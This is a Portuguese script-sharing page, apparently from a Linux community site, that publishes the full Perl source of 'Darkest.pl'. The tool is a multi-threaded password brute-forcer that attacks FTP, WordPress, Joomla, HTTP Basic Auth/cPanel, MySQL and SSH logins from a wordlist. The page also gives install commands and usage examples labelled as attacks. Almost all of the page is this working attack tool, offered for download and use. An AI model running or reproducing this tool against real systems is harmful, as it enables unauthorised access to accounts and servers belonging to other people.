Multi Brute Force

Publicado por Perfil removido (última atualização em 10/10/2013)

[ Hits: 8.640 ]

Download Darkest.pl




Esse script faz Brute Force em FTP, WordPress, Joomla!, Auth Basic, MySQL e SSH.

Para o script funcionar sem problemas, você precisa instalar a libssh e openssl, depois digitar no terminal:

# cpan YAML && cpan IO::Pty && cpan Net::OpenSSH && cpan WWW::Mechanize

  



Esconder código-fonte

#!/usr/bin/env perl

# Coder: MMxM
# Gr33tz 2: Cyclone , UT0P|4 , Md.morpheus , Hacker Fts315 , n4sss , MauzZz[BR] , chokao , c0de_universal

use strict;
use warnings;
use threads;
use Net::FTP;
use DBI;
use LWP;
use Net::OpenSSH;
use DBD::mysql;
use Getopt::Long;
use threads::shared;
use WWW::Mechanize;
use Term::ANSIColor qw(:constants);

sub banner {
    print '
    '.BRIGHT_GREEN.'[+]'.RESET.' Darkest Brute-force By MMxM v1.3

    '.BOLD BLUE.'[*]'.RESET.' Options:

        -u | --user => name of user         [example: admin]
        -h | --host => Target           [example: 127.0.0.1]
        -w | --wordlist => Wordlist     [example: /tmp/wordlist.txt]
        -t | --threads => number of threads [example: 10]
        -m | --module => module name        [example: wordpress]

    '.BRIGHT_GREEN.'[+]'.RESET.' list of modules:

        '.BOLD BLUE.'[*]'.RESET.' ftp
        '.BOLD BLUE.'[*]'.RESET.' wordpress
        '.BOLD BLUE.'[*]'.RESET.' joomla
        '.BOLD BLUE.'[*]'.RESET.' authbasic -> used by cpanel and protected diretories (htaccess)
        '.BOLD BLUE.'[*]'.RESET.' mysql
        '.BOLD BLUE.'[*]'.RESET.' ssh


    '.BRIGHT_GREEN.'[+]'.RESET.' Examples of use:

    $ ./dark.pl -u admin -h 127.0.0.1 -w wl.txt -t 50 -m ftp            | FTP-ATTACK
    $ ./dark.pl -u admin -h localhost/wp-login.php -w wl.txt -t 100 -m wordpress    | WP-ATTACK
    $ ./dark.pl -u admin -h localhost/administrator/ -w wl.txt -t 100 -m joomla | JOOMLA-ATTACK
    $ ./dark.pl -u admin -h localhost:2082 -w wl.txt -t 100 -m authbasic        | CPANEL-ATTACK
    $ ./dark.pl -u admin -h localhost -w wl.txt -t 100 -m mysql         | MYSQL-ATTACK
    $ ./dark.pl -u admin -h 127.0.0.1 -w wl.txt -t 20 -m ssh            | SSH-ATTACK

';
    exit(1);
}

my($wordlist,$thr,$ini,$fin,@threads,$arq,$i,@a,$test);
our($user,$host,@aa,$type,$token);

GetOptions( 'u|user=s'  => \$user,
        'h|host=s' => \$host,
        'w|wordlist=s' => \$wordlist,
        'm|module=s' => \$type,
        't|threads=i' => \$thr
) || die &banner;

if(defined($type)){
    foreach('ftp','wordpress','joomla','authbasic','mysql','ssh'){
        if($type eq $_){
            $type = \&$type;
            $test = 1;
            last;
        }
    }

    if(!defined($test)){
        &banner;
    }

} else {
    &banner;
}

&banner if (!defined($user)) || (!defined($host)) || (!defined($wordlist)) || (!defined($thr));

open($arq,"<$wordlist") || die($!);
@a = <$arq>;
close($arq);
@aa = grep { !/^$/ } @a;

print "\n".BRIGHT_GREEN.'[+]'.RESET." Starting Attack";
print "\n".BRIGHT_GREEN.'[+]'.RESET." Host => $host";
print "\n".BRIGHT_GREEN.'[+]'.RESET." User => $user";
print "\n".BRIGHT_GREEN.'[+]'.RESET." Wordlist => $wordlist";
print "\n".BRIGHT_GREEN.'[+]'.RESET." Threads => $thr\n\n";

my $stop :shared = 0;

$ini = 0;
$fin = $thr - 1;

while(1){

    @threads = ();

    #die("\n\n".BRIGHT_GREEN."[+]".RESET." 100% complete\n\n") if $stop;

    for($i=$ini;$i<=$fin;$i++){
        push(@threads,$i);
    }

    foreach(@threads){
        $_ = threads->create(\&brute);
    }

    foreach(@threads){
        $_->join();
    }

    print("\n\n".BRIGHT_GREEN."[+]".RESET." 100% complete\n\n") if $stop;
    exit(0) if $stop;

    for($i=$ini;$i<=$fin;$i++){
        #last if $stop;
        print BOLD RED.'[-]'.RESET." Trying => $aa[$i]";# if(defined($aa[$i]));
    }

    $ini = $fin + 1;
    $fin = $fin + $thr;

}

sub brute {

    my $id = threads->tid();
    threads->exit() if $stop;
    $id--;
    if(defined($aa[$id])){
        &$type($aa[$id]);
    } else {
        $stop = 1;
    }
}

sub ftp {
    my($pass) = @_;
    chomp($pass);

    my $f = Net::FTP->new($host) || die($!);

    if($f->login($user, $pass)){
        $f->quit;
        print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
        $stop = 1;
    } else {
        $f->quit;
        return;
    }
}

sub mysql {
    my($pass) = @_;
    chomp($pass);
    my $dsn = "dbi:mysql::$host:3306";
    my $DBIconnect = DBI->connect($dsn, $user, $pass,{
        PrintError => 0,
        RaiseError => 0
    });
    if(!$DBIconnect){
        return;
    } else {
        print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
        $stop = 1;
    }
}

sub authbasic {
    my($pass) = @_;
    chomp($pass);

    if($host !~ /^(http|https):\/\//){
        $host = 'http://'.$host;
    }
    my $ua = LWP::UserAgent->new;
    my $req = HTTP::Request->new(GET => $host);
    $req->authorization_basic($user, $_);
    if($ua->request($req)->code == 401){
        return;
    } else {
        print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
        $stop = 1;
    }
}

sub wordpress {
    my($pass) = @_;
    chomp($pass);

    my $ua = new LWP::UserAgent;
    if ($host !~ /^(http|https):\/\//){
        $host = 'http://' . $host;
    }

        my $response = $ua->post($host,{
            'log' => $user,
            'pwd' => $pass,
            'wp-submit' => 'Log in',
    });
    my $code = $response->code;
    if($code =~ /302/){
        print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
        $stop = 1;
    } else {
        return;
    }
}

sub joomla {
    my($pass) = @_;
    chomp($pass);

    if ($host !~ /^(http|https):\/\//){
        $host = 'http://' . $host;
    }

    my $mech = WWW::Mechanize->new();
    $mech->get($host);
    if($mech->content() =~ /([0-9a-fA-F]{32})/){
        $token = $1;
    } else {
        die("\n[-] Error to get security token\n");
    }

    $mech->submit_form(
        fields => {
            username => $user,
            passwd  => $pass,
            task  => 'login',
            $token  => '1',
        }
    );

    if($mech->content() !~ /com_categories/i){
        return;
    } else {
        print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
        $stop = 1;
    }
}

sub ssh {
    my($pass) = @_;
    chomp($pass);

    open(my $stderr_fh,'>>/dev/null') || die $!;
    open(my $stdout_fh,'>>/dev/null') || die $!;

    my %opts = (
        user => $user,
        passwd => $pass,
        default_stderr_fh => $stderr_fh,
        default_stdout_fh => $stdout_fh,
        timeout => 20,
    );

    my $ssh = Net::OpenSSH->new($host,%opts);

    if($ssh->error){
        return;
    } else {
        print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
        $stop = 1;
    }
}

Scripts recomendados

Port Scan

Scanner TCP/ping

Ossec2MySQL

R4$T4 Scan - Portscan básico comentado

Code que "brinca" com senhas


  

Comentários

Nenhum comentário foi encontrado.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts